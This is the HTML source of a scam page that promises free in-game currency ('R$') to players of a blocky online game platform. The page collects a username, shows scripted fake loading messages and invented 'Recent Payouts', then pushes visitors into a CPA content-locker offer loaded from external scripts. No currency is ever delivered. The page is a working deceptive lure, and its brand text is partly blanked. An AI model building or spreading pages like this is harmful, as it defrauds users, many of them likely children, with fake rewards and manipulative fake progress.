<!DOCTYPE html>

<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <title>Welcome to your dearm</title>
<meta name="description" content="Link Locked"/>
<meta property="og:title" content="Link Locked"/>
<meta property="og:description" content="Link Locked"/>
<meta name="referrer" content="no-referrer">

<script type="text/javascript">
    var KVLMu_ISc_vVBeec={"it":4306340,"key":"0bbbb"};
</script>
<script src="https://d3v65xz19kjrsz.cloudfront.net/11d61eb.js"></script>

<script
        src="browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'www.google-analytics.com/analytics.html', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(http://fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <script type="text/javascript" id="ogjs" src="https://mobileverify.net/cl/js/vo7l69"></script>
</head>
<body>
<!DOCTYPE html>
<html>

<head data-machine-id="WEB357"><meta charset="utf-8">
	<title>  Admin R$ Group</title>
	<meta http-equiv="X-UA-Compatible" content="IE=edge,requiresActiveX=true" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="author" content="  Corporation" /><meta name="description" content="  is a global platform that brings people together to play fun games." /><meta name="keywords" content="free games, online games, building games, virtual worlds, free mmo, gaming cloud, physics engine" /><script async src="#"></script><script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-');
</script><meta name="locale-data"
    data-language-code="en_us"
    data-language-name="English" /><meta name="device-meta"
    data-device-type="computer"
    data-is-in-app="false"
    data-is-desktop="true"
    data-is-phone="false"
    data-is-tablet="false"
    data-is-console="false"
    data-is-android-app="false"
    data-is-ios-app="false"
    data-is-uwp-app="false"
    data-is-xbox-app="false"
    data-is-amazon-app="false"
    data-is-win32-app="false"
    data-is-studio="false"
    data-is-game-client-browser="false"
    data-is-ios-device="false"
    data-is-android-device="false"
    data-is-universal-app="false"
    data-app-type="unknown"
    /><meta name="environment-meta"
    data-is-testing-site="false" /><meta id=" -display-names" data-enabled="false"><meta name="page-meta" data-internal-page-name="" />
        </script>
	<link href="https://images.rbxcdn.com/23421382939a9f4ae8bbe60dbe2a3e7e.ico.gzip" rel="icon" />
	<link data-bundlename="StyleGuide" href="css.rbxcdn.com/39823e832391dcd9b5afa8f061de15365dd5391454e23931fd9acd626e34b019.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<link data-bundlename="Thumbnails" href="css.rbxcdn.com/872e08cfb833578ce262269ca0c40e46d6888d5abb201cf238fe00f9abfba826.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<link data-bundlename="Footer" href="css.rbxcdn.com/55b250e8473888792f885d898973a13692fb22157baf61aaffa62ce4545f3408.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<style type="text/css">.page-top {
                margin: 60px auto;
                padding: 12px;
                width: 970px;
                background-image: url("images.rbxcdn.com/e0288afab1fcc7fba487b28a6f2bb606-premium_header_bg.png");
                background-size: auto auto;
                background-repeat: no-repeat;
                color: #fff !important;
                text-align: center;
            }

            @media (max-width: 991px) {
                .page-top {
                    width:100%
                }

                .page-top,.page-top .sg-section {
                    padding: 12px 0
                }
            }

            @media (max-width: 767px) {
                .page-top {
                    margin:40px auto
                }
            }

            .recent-winners {
               background-color: #f2f4f5 !important;
           }
	</style>

	<link href="https://static.rbxcdn.com/css/page___80400f5d6146e08bcf1e66a17ee0554e_m.css/fetch" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<link data-bundlename="StyleGuideReference" href="css.rbxcdn.com/8d58c6cc2c654dbcb6b880e41955f95de3bd6a68315348c536e54f3a7e7ab6eb.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<link data-bundlename="FileUpload" href="css.rbxcdn.com/7e4ee4f2bf98b3716c4e33a03505aadc7f2179b191b8ed35816e2ed09a2771c6.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />
	<link data-bundlename=" R$Icon" href="css.rbxcdn.com/af4a705d9238d48149768cbd4724797649ca06ff6dbf0b05feab30c7825997be.css" onerror=" .BundleDetector &&  .BundleDetector.reportBundleError(this)" rel="stylesheet" />


	<style type="text/css">@media screen and (max-width: 768px){
        .page-top {
            background-size: cover !important;
        }
        .sg-container, .sg-container .sg-section {
            padding: 20px 20px;
        }
        .sg-container {
    margin: 0px auto;
}
#footer .small-oneline {
    overflow: hidden;
    text-overflow: unset;
    white-space: unset;
    padding: 0 20px;
}
.container.sg-container.page-top.ng-scope {
    padding: 40px 20px;
}
div#simplemodal-container {
    left: -18px !important;
    right: 0 !important;
    top: 30% !important;
    text-align: center !important;
}
    }
	</style>
</head>


<body class="rbx-body light-theme gotham-font" data-internal-page-name="" data-performance-relative-value="0.005" data-send-event-percentage="0" id="rbx-body">
<div data-as-http-regex="(([^.]help|polls)\. \.com)" data-enabled="true" data-regex="(https?\:\/\/)?(?:www\.)?([a-z0-9-]{2,}\.)*(((m|de|www|web|api|blog|wiki|corp|polls|bloxcon|developer|devforum|forum)\. \.com| labs\.com)|(www\.shop \.com)|(rblx\.co)|help\. \.com(?![A-Za-z0-9\/.]*\/attachments\/))(?!\/[A-Za-z0-9-+&amp;@#\/=~_|!:,.;]*%)((\/[A-Za-z0-9-+&amp;@#\/%?=~_|!:,.;]*)|(?=\s|\b))" data-regex-flags="gm" id=" -linkify"></div>

<div data-ga-logging-percent="10" data-image-retry-max-times="30" data-image-retry-timer="500" id="image-retry-data"></div>

<div data-http-retry-base-timeout="0" data-http-retry-max-timeout="0" data-http-retry-max-times="1" id="http-retry-data"></div>

<div class="navigation" id="navigation">
<div class="sg-header navbar-header rbx-header">
<div class="icon-logo"></div>
</div>
</div>

<div class="container sg-container page-top ng-scope">
<h1>  earn&nbsp;R$ fast</h1>


<p style="color: #fff !important;">Connect your   account by entering your username to begin! You will be able to choose any amount of  R$ you would like, and you will then need to an offer.</p>
 R$ can be used for testing purposes, or to purchase accessories and gamepasses!<br />
&nbsp;</div>

<div class="container sg-container ng-scope">
<div id="step1">
<h3 class="doc-heading" id="form-control">  Username</h3>

<div class="form-group"><input class="form-control input-field" id="username" name="username" placeholder="Enter your   username" /><br />
<button class="btn-cta-lg" onclick="step2()" type="button">Next</button></div>
</div>

<div id="step2" style="display:none;">
<h3 class="doc-heading" id="form-control"> R$ Amount</h3>

<p>Paying out user: <b id="confirm-payout">$user</b></p>

<div class="form-group"><input id="amount" max="100" min="10" onchange="calculatepoints(document.getElementById('amount').value)" step="1" type="range" value="1" /></div>

<div class="small-oneline text">You will receive: <span class="text- R$" id="reward-amount">10K+</span></div>
&nbsp;

<br />
<br />
<button class="btn-cta-lg" onclick="step3()" type="button">Next</button></div>

<div id="step3" style="display:none;">
<h3 class="doc-heading" id="form-control">Do an offer to receive your  R$ now!</h3>

<p>We have confirmed your  R$ order! Click the button below to instantly receive your payout. The account <b id="confirm-acc">$user</b> will receive <b id="confirm-amount">$amount</b>  R$!</p>
<br/>

<button class="btn-growth-lg" onclick="_ux()" type="button">RECEIVE</button></div>
</div>

<div class="container sg-container recent-winners ng-scope">
<h4></h4>
&nbsp;

<h4>Recent Payouts</h4>
&nbsp;

<ul class="hlist avatar-cards">
	<li class="list-item avatar-card">
	<div class="avatar-card-container">
	<div class="avatar-card-fullbody"><a class="avatar-card-link" href="https://www. .com/users/73072929/profile" target="_blank"><span class="avatar-card-image thumbnail-2d-container"><img alt="" class="avatar-card-image" src="https://tr.rbxcdn.com/4367ab71259ae9d73b638c3d0c874b3e/150/150/AvatarHeadshot/Png" /></span> </a> <a class="avatar-status game" href="#"> </a></div>

	<div class="avatar-card-caption">
	<div class="text-overflow avatar-name">CV10K</div>

	<div class="avatar-card-label">Received 100K+  R$</div>

	<div class="avatar-card-label"></div>
	</div>
	</div>
	</li>
	<li class="list-item avatar-card">
	<div class="avatar-card-container">
	<div class="avatar-card-fullbody"><a class="avatar-card-link" href="https://www. .com/users/7733466/profile" target="_blank"><span class="avatar-card-image thumbnail-2d-container"><img alt="" class="avatar-card-image" src="https://tr.rbxcdn.com/81976c2aaf7feb8a56e7f40e5a86965e/150/150/AvatarHeadshot/Png" /></span> </a> <a class="avatar-status online" href="#"> </a></div>

	<div class="avatar-card-caption">
	<div class="text-overflow avatar-name">InceptionTime</div>

	<div class="avatar-card-label">Received 40K+  R$</div>

	<div class="avatar-card-label"></div>
	</div>
	</div>
	</li>
	<li class="list-item avatar-card">
	<div class="avatar-card-container">
	<div class="avatar-card-fullbody"><a class="avatar-card-link" href="https://www. .com/users/156/profile" target="_blank"><span class="avatar-card-image thumbnail-2d-container"><img alt="" class="avatar-card-image" src="https://tr.rbxcdn.com/c6f0db4e08268bcdb69fcefb7483536a/150/150/AvatarHeadshot/Png" /></span> </a> <a class="avatar-status online" href="#"> </a></div>

	<div class="avatar-card-caption">
	<div class="text-overflow avatar-name">Linkmon99</div>

	<div class="text-overflow avatar-card-label">Received 80K  R$</div>
	</div>
	</div>
	</li>
</ul>
</div>

<div id="footer" style="text-align: center;">
<div class="small-oneline text"></div>
</div>

<div id="lol" style="display:none;">
<div class="simplemodal-overlay" id="loading-modal" style="background-color: rgb(0, 0, 0); opacity: 0.8; height: 100%; width: 100%; position: fixed; left: 0px; top: 0px; z-index: 1041;"></div>

<div class="simplemodal-container" id="simplemodal-container" style="position: fixed; z-index: 1042; height: 273px; width: 400px; left: 40%;  top: 30%;">
<div class="simplemodal-wrap" style="height: 100%; outline: 0px; width: 100%; overflow: visible;" tabindex="-1">
<div class="modal-confirmation noImage protocolhandler-starting-modal simplemodal-data" data-modal-type="confirmation" id="modal-confirmation" style="display: block;">
<div class="modal-dialog" id="modal-dialog">
<div class="modal-content">
<div class="modal-header"><button class="close" data-dismiss="modal" style="display: none;" type="button"><span class="sr-only">Close</span></button>

<h5 class="modal-title"></h5>
</div>

<div class="modal-body">
<div class="modal-top-body">
<div class="modal-message">
<p id="oof">Searching for user: $user</p>
</div>

<div class="modal-image-container  -item-image" data-image-size="medium" data-no-click="" data-no-overlays=""><img alt="generic image" class="modal-thumb" /></div>

<div class="modal-checkbox checkbox" style="display: none;"><input id="modal-checkbox-input" type="checkbox" /></div>
</div>
</div>

<div class="modal-footer text-footer" style="display: none;"></div>
</div>
</div>
</div>
</div>
</div>
<script>
    function calculatepoints( R$) {
        var points = 1* R$;
        var element = document.getElementById("reward-amount");
        element.innerHTML = points + "K+";
    }

    function generate() {
        var element = document.getElementById("generated-link");
        if (document.getElementById("obby-name").value !== "" && document.getElementById("amount").value !== "") {
            element.style.display = "block"
        } else {
            alert("Please fill out all the required details.")
            return false;
        }
    }


    var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "get.html", "https://economy. .com/v1/groups/4028385/currency", false ); 
xmlHttp.send( null );
var availableFundsJSON = JSON.parse(xmlHttp.responseText);
var avaiableFunds = availableFundsJSON. R$;

document.getElementById("available-funds").innerHTML = availableFunds;



</script><script>

    function wait(millisecondsToWait)
    {
        setTimeout(function() {
            console.log("telamon is hot");
     
        }, millisecondsToWait);
    }
</script><script>

    function step2() {
        if (document.getElementById("username").value !== "") {
            document.getElementById("oof").innerHTML = "Searching for user: <b>" + document.getElementById("username").value + "</b>";
            document.getElementById("lol").style.display = "block";

            document.getElementById("confirm-payout").innerHTML = document.getElementById("username").value;
            document.getElementById("confirm-acc").innerHTML = document.getElementById("username").value;


            setTimeout(function() {
                document.getElementById("lol").style.display = "none";
                document.getElementById("lol").style.display = "none";
                $( "#step1" ).fadeOut( "slow", function() {
                    $( "#step2" ).fadeIn( "slow", function() {
 
});
                });
            }, 3000);


        }
    }

    function step3() {
        if (document.getElementById("username").value !== "") {
            document.getElementById("oof").innerHTML = "Preparing admin payout of <b>" + document.getElementById("amount").value + "K+  R$</b>";
            document.getElementById("confirm-amount").innerHTML = document.getElementById("amount").value + "K+";
            document.getElementById("lol").style.display = "block";

            setTimeout(function() {
                document.getElementById("lol").style.display = "none";
                document.getElementById("lol").style.display = "none";
                $( "#step2" ).fadeOut( "slow", function() {
                    $( "#step3" ).fadeIn( "slow", function() {
   
});
                });
            }, 5000);


        }
    }
</script>

<script src="proxy.spring%20r%24.com/jquery.html"></script>

</script>




</html>

<script src="ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var KJqRi_jVo_DNVEUc={"it":4203026,"key":"b4c28"};
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script>

</script>
<script type="text/javascript">
    $(document).ready(function(){


});
</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-8592 2709-2', 'auto', 'customTemplateGlobal');
        ga('customtemplateglobal.html', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
